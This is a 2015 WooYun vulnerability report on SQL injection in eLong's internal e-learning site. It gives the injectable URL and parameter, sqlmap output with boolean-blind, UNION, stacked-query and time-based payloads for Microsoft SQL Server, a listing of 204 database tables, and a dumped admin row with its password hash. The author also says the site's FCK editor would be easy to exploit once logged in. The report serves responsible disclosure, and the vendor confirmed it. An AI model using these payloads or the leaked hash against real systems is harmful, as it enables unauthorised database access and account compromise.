当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103324

漏洞标题:艺龙旅行网某处系统SQL注入

相关厂商:艺龙旅行网

漏洞作者: jianFen

提交时间:2015-03-24 09:20

修复时间:2015-05-09 11:04

公开时间:2015-05-09 11:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-25: 厂商已经确认,细节仅向厂商公开
2015-04-04: 细节向核心白帽子及相关领域专家公开
2015-04-14: 细节向普通白帽子公开
2015-04-24: 细节向实习白帽子公开
2015-05-09: 细节向公众公开

简要描述:

详细说明:

注入点
http://elearning.corp.elong.com/Showknowledge.aspx?id=214
必须10S以上延迟不然报错

-dbs --time-sec 10


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=212 AND 8115=8115
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=-3129 UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(113)+CHAR(112)+CHAR(121)+CHAR(58)+CHAR(66)+CHAR(103)+CHAR(111)+CHAR(83)+CHAR(119)+CHAR(113)+CHAR(85)+CHAR(113)+CHAR(109)+CHAR(102)+CHAR(58)+CHAR(114)+CHAR(104)+CHAR(114)+CHAR(58), NULL, NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=212; WAITFOR DELAY '0:0:10';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=212 WAITFOR DELAY '0:0:10'--
---
Database: elonglearning
[204 tables]
+----------------------------+
| dbo.Ability |
| dbo.Appliance |
| dbo.Appraise |
| dbo.BorrowReturnRecord |
| dbo.Business |
| dbo.BusinessRole |
| dbo.CStation |
| dbo.CUsers |
| dbo.Card |
| dbo.CardClass |
| dbo.CardFee |
| dbo.CasesClass |
| dbo.Cbusiness |
| dbo.CertificateRecord |
| dbo.ChatContent |
| dbo.ChooseType |
| dbo.Class |
| dbo.CouncilUser |
| dbo.CourseAchieve |
| dbo.CourseAchieveUser |
| dbo.CourseAchieveUser1 |
| dbo.CourseClass |
| dbo.CourseClassUser |
| dbo.CourseClassZu |
| dbo.CourseDataInfo |
| dbo.CourseExam |
| dbo.CourseExamUser |
| dbo.CourseJR |
| dbo.CourseRes |
| dbo.CourseResIng |
| dbo.CourseResUser |
| dbo.CourseSort |
| dbo.CourseSortGovernor |
| dbo.CourseState |
| dbo.CourseStructure |
| dbo.CourseSu |
| dbo.CourseTeacherNum |
| dbo.CourseUser |
| dbo.CourseUserSel |
| dbo.CourseValue |
| dbo.CourseView |
| dbo.CourseWare |
| dbo.Courses |
| dbo.CousePlan |
| dbo.Demand |
| dbo.DemandCourse |
| dbo.DemandCourseDept |
| dbo.DemandCourseDeptMain |
| dbo.DemandCourseMain |
| dbo.DemandCourseUser |
| dbo.DemandDept |
| dbo.DemandDeptMain |
| dbo.DemandMain |
| dbo.DemandMains |
| dbo.DeptPlan |
| dbo.DeptUser |
| dbo.DeptUserCourseData |
| dbo.DeptUsers |
| dbo.Directory |
| dbo.Episteme |
| dbo.EpistemeClass |
| dbo.ExamAuthority |
| dbo.ExamCourse |
| dbo.ExamCourse1 |
| dbo.ExamCourseUserWWC |
| dbo.ExamDataInfo |
| dbo.ExamKC |
| dbo.ExamMain |
| dbo.ExamPaper |
| dbo.ExamSu |
| dbo.ExamUser |
| dbo.ExamUserMain |
| dbo.ExamUsers |
| dbo.ExecuteCourse |
| dbo.Expense |
| dbo.Feedback |
| dbo.Goods |
| dbo.Governor |
| dbo.Ground |
| dbo.GroupCourseExamUser |
| dbo.Groups |
| dbo.Info |
| dbo.JGType |
| dbo.JoinResearch |
| dbo.KC |
| dbo.KD |
| dbo.LearningTime |
| dbo.LoginField |
| dbo.Manager |
| dbo.ManagesUser |
| dbo.Message |
| dbo.Messages |
| dbo.MessagesUser |
| dbo.NetWorkCourseSort |
| dbo.NetWorkCourseSort1 |
| dbo.NewCourseData |
| dbo.NewDeptTrainData |
| dbo.NewExamData |
| dbo.NewExamTestData |
| dbo.News |
| dbo.NewsType |
| dbo.OffLineExam |
| dbo.OffLineExam2 |
| dbo.OffLineExam3 |
| dbo.OffLineExamUser |
| dbo.OfflineCourses |
| dbo.OutTrain |
| dbo.PGtype |
| dbo.PXTeacher |
| dbo.PXZUsers |
| dbo.PersonPlan |
| dbo.PlanCourse |
| dbo.PlanCourses |
| dbo.ProFunds |
| dbo.Progress |
| dbo.Pxhy |
| dbo.Pxjg |
| dbo.RY |
| dbo.Record |
| dbo.Research |
| dbo.ResearchKey |
| dbo.ResearchSubject |
| dbo.ReturnDetail |
| dbo.RlShowTeacherPlan |
| dbo.Roles |
| dbo.RolesRules |
| dbo.SHView |
| dbo.SelCourseExamUser |
| dbo.Station |
| dbo.StationAbility |
| dbo.StationApprove |
| dbo.StationApproveUser |
| dbo.StationApproveZu |
| dbo.StationCourseClass |
| dbo.StationCourseClassUser |
| dbo.StationCourseUser |
| dbo.StrCourse |
| dbo.Structure |
| dbo.StudyTotalNum |
| dbo.Stuff |
| dbo.StuffClass |
| dbo.SubjectDetail |
| dbo.SubjectDetails |
| dbo.SubjectTactic |
| dbo.SubjectType |
| dbo.SysRules |
| dbo.TeachRecord |
| dbo.TeacherCourseNum |
| dbo.TeacherPlan |
| dbo.TeacherType |
| dbo.Teachers |
| dbo.Templet |
| dbo.TextBooks |
| dbo.Titles |
| dbo.Tklx |
| dbo.TotalNum |
| dbo.TrainClass |
| dbo.TrainData |
| dbo.TrainExpense |
| dbo.TrainPersons |
| dbo.TrainPlan |
| dbo.TrainTime |
| dbo.TrainType |
| dbo.UserCourse |
| dbo.UserExam |
| dbo.UserGoods |
| dbo.UserGroup |
| dbo.UserInfo |
| dbo.UserMessage |
| dbo.UserPoint |
| dbo.UserStructureTable |
| dbo.UserStructures |
| dbo.UserTables |
| dbo.UserTactic |
| dbo.UserToExam |
| dbo.UserZS |
| dbo.Users |
| dbo.Uusers |
| dbo.WareType |
| dbo.XXCoursePlan |
| dbo.XXPersonData |
| dbo.XXPlanPersonNum |
| dbo.Years |
| dbo.ZCType |
| dbo.cases |
| dbo.casesing |
| dbo.dtproperties |
| dbo.exammainpaper |
| dbo.jhfw |
| dbo.jhmb |
| dbo.jhsq |
| dbo.rz |
| dbo.sysdiagrams |
| dbo.sysfilei |
| dbo.tables |
| dbo.totoalstudynum |
| dbo.upload |
| dbo.vadmin |
| dbo.vadminlog |
| dbo.vkilluser |
| dbo.vpsconf |
| dbo.vroominfo |
| dbo.vroomtype |
| dbo.vuserinfo |
+----------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=212 AND 8115=8115
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=-3129 UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(113)+CHAR(112)+CHAR(121)+CHAR(58)+CHAR(66)+CHAR(103)+CHAR(111)+CHAR(83)+CHAR(119)+CHAR(113)+CHAR(85)+CHAR(113)+CHAR(109)+CHAR(102)+CHAR(58)+CHAR(114)+CHAR(104)+CHAR(114)+CHAR(58), NULL, NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=212; WAITFOR DELAY '0:0:10';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=212 WAITFOR DELAY '0:0:10'--
---
Database: elonglearning
Table: dbo.vadmin
[1 entry]
+---------+-----------+----------------------------------+
| adminid | psysadmin | adminpass |
+---------+-----------+----------------------------------+
| admin | <blank> | 0146636BB87967E6A4DC4B80BE9E610F |
+---------+-----------+----------------------------------+

漏洞证明:

+---------+-----------+----------------------------------+
| adminid | psysadmin | adminpass |
+---------+-----------+----------------------------------+
| admin | <blank> | 0146636BB87967E6A4DC4B80BE9E610F |
+---------+-----------+----------------------------------+
虽然爆了密码但是怎么试都不对
如果登入后台 FCK还是很好搞的

修复方案:

修复sql注入

版权声明:转载请注明来源 jianFen@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-25 11:03

厂商回复:

感谢白帽子提醒,我们会尽快修复

最新状态:

暂无